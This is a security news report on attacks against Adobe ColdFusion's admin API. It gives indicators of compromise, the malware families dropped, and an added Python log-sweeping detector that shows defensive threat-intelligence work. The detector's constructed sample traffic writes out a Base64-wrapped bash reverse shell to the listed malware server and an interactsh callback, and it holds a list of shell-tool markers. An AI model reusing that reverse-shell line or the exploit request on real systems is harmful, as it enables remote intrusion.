Hackers Exploit Pre-Authentication RCE Vulnerabilities in Adobe ColdFusion

Adobe ColdFusion is a Java-based, commercial web application development platform that uses CFML (ColdFusion Markup Language) for server-side programming.

ColdFusion is primarily known for its distinctive tag-based approach to server-side code. It is also popular with developers for its adaptability across a wide range of industries.

Cybersecurity researchers at Fortinet recently uncovered that Windows and macOS users face risk from Adobe ColdFusion vulnerabilities that remote attackers are targeting for pre-authentication remote code execution (RCE).

Technical Analysis

Hackers target the URI ‘/CFIDE/adminapi/accessmanager.cfc’, injecting payloads via a POST request into the ‘argumentCollection’ parameter. The endpoint sits under the CFIDE administrator API and the request needs no prior login, which is what makes these flaws pre-authentication RCE.

In July, researchers spotted probing activity that relied on interactsh, an open-source out-of-band interaction tool. The tool generates unique domain names; when an exploit payload makes a DNS or HTTP request to one of them, the callback confirms that the payload executed, which is how testers validate exploits and monitor for vulnerable hosts.

Attacker’s webpage at different times on 8/24

Threat actors misuse the same mechanism: by monitoring their domains for callbacks, they can confirm which targets are vulnerable before sending a real payload. Here are the related domains collected by the researchers:-

  • mooo-ng[.]com
  • redteam[.]tf
  • h4ck4fun[.]xyz

Probing activities involving other domains (Source – Fortinet)

Once the Adobe ColdFusion flaw has been exploited, the attackers deliver Base64-encoded payloads that spawn reverse shells back to infrastructure they control. The encoding hides the shell command from naive string matching, so defenders inspecting the ‘argumentCollection’ parameter should decode any Base64 blobs before looking for shell commands.

The attacks were traced to several source IP addresses, listed here:-

  • 81[.]68[.]214[.]122
  • 81[.]68[.]197[.]3
  • 82[.]156[.]147[.]183

The malware was downloaded from a publicly accessible HTTP file server:-

  • 103[.]255[.]177[.]55[:]6895
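As an added example (not from the article or from Fortinet), the following Python sweeps raw HTTP requests, as a WAF, reverse proxy or IDS that records request bodies would log them, for the exploitation pattern described above: a POST to /CFIDE/adminapi/accessmanager.cfc carrying an ‘argumentCollection’ value, callbacks to the listed interactsh domains, requests from the listed attacker IPs, references to the malware server, and Base64 blobs that decode to a reverse shell. The indicators are the ones given in this article with the defanging brackets removed; the sample requests, the shell-marker list and the host name cf.example.internal are constructed for the demo and are assumptions, not captured traffic.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlencode

# Indicators from the article, with the defanging brackets removed so they match real traffic
TARGET_URI = "/CFIDE/adminapi/accessmanager.cfc"
CALLBACK_DOMAINS = {"mooo-ng.com", "redteam.tf", "h4ck4fun.xyz"}
ATTACKER_IPS = {"81.68.214.122", "81.68.197.3", "82.156.147.183"}
MALWARE_SERVER_IP = "103.255.177.55"

# Heuristic markers for a decoded reverse shell (our own list, an assumption, not from the article)
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "sh -i", "/bin/sh", "nc ", "ncat ", "powershell")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


@dataclass
class Finding:
    client_ip: str
    reasons: List[str] = field(default_factory=list)
    decoded_payloads: List[str] = field(default_factory=list)


def parse_http_request(raw: str) -> Tuple[str, str, str]:
    """Split a raw HTTP/1.1 request (as a WAF or IDS logs it) into method, path and body."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n")[0].split(" ")
    method = parts[0] if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    return method, path, body


def decode_base64_blobs(text: str) -> List[str]:
    """Decode every Base64-looking run in text that yields printable UTF-8; skip anything else."""
    decoded = []
    for match in B64_RE.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text_out = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not really Base64, or binary content
        if all(c.isprintable() or c in "\r\n\t" for c in text_out):
            decoded.append(text_out)
    return decoded


def analyze_request(client_ip: str, raw_request: str) -> Optional[Finding]:
    """Return a Finding if the request matches the exploit pattern or known infrastructure, else None."""
    method, path, body = parse_http_request(raw_request)
    finding = Finding(client_ip=client_ip)
    if client_ip in ATTACKER_IPS:
        finding.reasons.append(f"source IP {client_ip} is a known attacker address")
    if method.upper() != "POST" or path.split("?", 1)[0].lower() != TARGET_URI.lower():
        return finding if finding.reasons else None
    # The exploit carries its payload in argumentCollection; parse_qs undoes the form encoding
    params = parse_qs(body, keep_blank_values=True)
    arg = " ".join(params.get("argumentCollection", []))
    if not arg:
        finding.reasons.append("POST to the CFIDE admin API without argumentCollection; verify the source")
        return finding
    finding.reasons.append("argumentCollection payload posted to accessmanager.cfc")
    lowered = arg.lower()
    for domain in CALLBACK_DOMAINS:
        if domain in lowered:
            finding.reasons.append(f"callback to interactsh-style domain {domain}")
    payloads = decode_base64_blobs(arg)
    for decoded in payloads:
        if any(marker in decoded.lower() for marker in SHELL_MARKERS):
            finding.decoded_payloads.append(decoded)
            finding.reasons.append("Base64-encoded reverse shell inside argumentCollection")
    if MALWARE_SERVER_IP in lowered or any(MALWARE_SERVER_IP in p for p in payloads):
        finding.reasons.append(f"reference to malware server {MALWARE_SERVER_IP}")
    return finding


def sweep(entries: List[Tuple[str, str]]) -> List[Finding]:
    """Run analyze_request over (client_ip, raw_request) pairs and keep only the hits."""
    return [f for f in (analyze_request(ip, req) for ip, req in entries) if f is not None]


def build_sample_requests() -> List[Tuple[str, str]]:
    """Constructed sample traffic (not captured data): one exploit attempt and one benign request."""
    shell_cmd = "bash -i >& /dev/tcp/103.255.177.55/6895 0>&1"
    encoded = base64.b64encode(shell_cmd.encode()).decode()
    # Probe-then-execute: a DNS callback to an interactsh domain, then the Base64 reverse shell
    probe = f"nslookup c7k1probe.mooo-ng.com; echo {encoded} | base64 -d | bash"
    body = urlencode({"argumentCollection": probe})
    attack = (
        "POST /CFIDE/adminapi/accessmanager.cfc HTTP/1.1\r\n"
        "Host: cf.example.internal\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )
    benign = "GET /index.cfm HTTP/1.1\r\nHost: cf.example.internal\r\n\r\n"
    return [("81.68.214.122", attack), ("10.0.0.5", benign)]


if __name__ == "__main__":
    for finding in sweep(build_sample_requests()):
        print(finding.client_ip, *finding.reasons, sep="\n  - ")
        for payload in finding.decoded_payloads:
            print("  decoded:", payload)
```

Feed real (client_ip, raw_request) pairs into sweep() to run it against your own data. Ordinary access logs omit POST bodies, so the argumentCollection, callback-domain and Base64 checks need a WAF, reverse proxy or IDS that records request payloads; the URI and source-IP checks work on standard access logs as well.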

Malware Variants

Below are the malware variants the researchers observed being dropped after exploitation:

  • XMRig Miner: An open-source Monero (XMR) miner that consumes CPU cycles; it is used both legitimately and, as here, for cryptojacking on compromised hosts.
  • DDoS/Lucifer: A hybrid bot, first reported in 2020, that combines cryptojacking, DDoS attacks, C2 communication and vulnerability exploitation.
  • RudeMiner: Another hybrid bot that targets cryptocurrency wallets and carries out DDoS attacks.
  • BillGates/Setag: A Linux backdoor known for traffic hijacking, C2 server communication and launching attacks. In this campaign the sample checks for the marker file “bill.lock” before running, so the presence of that file on a host is a useful indicator of infection.

Researchers have been monitoring these flaws for weeks and have observed many attacks against Adobe ColdFusion servers. The flaws continue to be exploited in the wild even though Adobe has released fixes, so administrators should upgrade affected systems to the patched releases. Because the attacks go through the administrator API, access to the /CFIDE path should also be restricted to trusted administrative networks, as Adobe’s lockdown guidance recommends; that blocks this probing regardless of patch level.

IoCs

Attacker’s IP Address:

  • 81[.]68[.]214[.]122
  • 81[.]68[.]197[.]3
  • 82[.]156[.]147[.]183

Malware Server’s IP Address:

  • 103[.]255[.]177[.]55[:]6895

Files:

  • 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
  • 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
  • 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
  • 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a

Guru Baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.